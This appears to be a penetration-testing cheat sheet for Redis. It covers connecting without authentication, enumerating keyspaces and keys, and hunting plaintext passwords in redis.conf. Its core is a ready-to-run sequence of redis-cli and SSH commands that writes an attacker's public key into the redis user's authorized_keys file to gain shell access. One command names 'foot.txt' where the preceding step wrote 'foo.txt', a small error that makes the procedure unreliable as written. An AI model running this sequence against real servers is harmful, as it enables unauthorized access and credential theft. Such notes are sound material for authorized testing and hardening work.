PRIMARY CATEGORY → PROTOCOLS AND SERVICES
Theory
Remote Connection
By default, this protocol does not requiere authentication, which means that any actor can connect to the server remotely without providing valid credentials
Redis-cli
Setup
apt install -y -- redis-toolsUsage
redis-cli -h '<TARGET>'Enumeration
General Information
INFO
CONFIG GET *Keyspaces (Databases)
They can be listed with the INFO command and their data extracted as follows →
SELECT <KEYSPACE_INDEX> # e.g. SELECT 0
KEYS * # List all KEYS within the KEYSPACE
GET '<KEY>' # Obtain the data from a KEYSensitive Information
Even though we mentioned that redis does not require credentials by default, it can be configured to require them via the redis.conf file
The location of this configuration file can be enumerated as follows
redis-cli -h '<HOST>'
> INFOTherefore, once we gain access to the system or are able to list the content of specific system files, we should look for plain passwords within the configuration file
A user or set of users can be found as well in this file
Note that when redis authentication is set to only password, the username is “default”
SSH
An operator might be able to write files within the home directory of the redis user, which can be extracted from the output of the CONFIG GET *
Usually one of these is its home directory
/var/lib/redis
/home/redis/.sshIf an adversary knows the path, he can set the working directory to the .ssh directory and write an authorized_keys file containing a public key that he created previously
Then, he could authenticated via SSH as the redis user by providing the private key
To do so, proceed as follows
Generating an SSH Public-Private Key pair
ssh-keygen -t rsa -b 4096 -f redisWriting the Public Key to a file
printf "\n\n%s\n\n" "$( cat redis.pub )" > foo.txtImporting the file into Redis
cat foot.txt | redis-cli -h '<TARGET>' -x set ssh_key # KEY CreationSaving the Public Key as Authorized_keys
redis-cli -h '<TARGET>' config set dir /var/lib/redis/.ssh # Or /home/redis/.sshredis-cli -h '<TARGET>' config set dbfilename "authorized_keys"redis-cli -h '<TARGET>' savePub Key Authentication as Redis user via SSH
ssh -p <PORT> -i redis redis@<TARGET>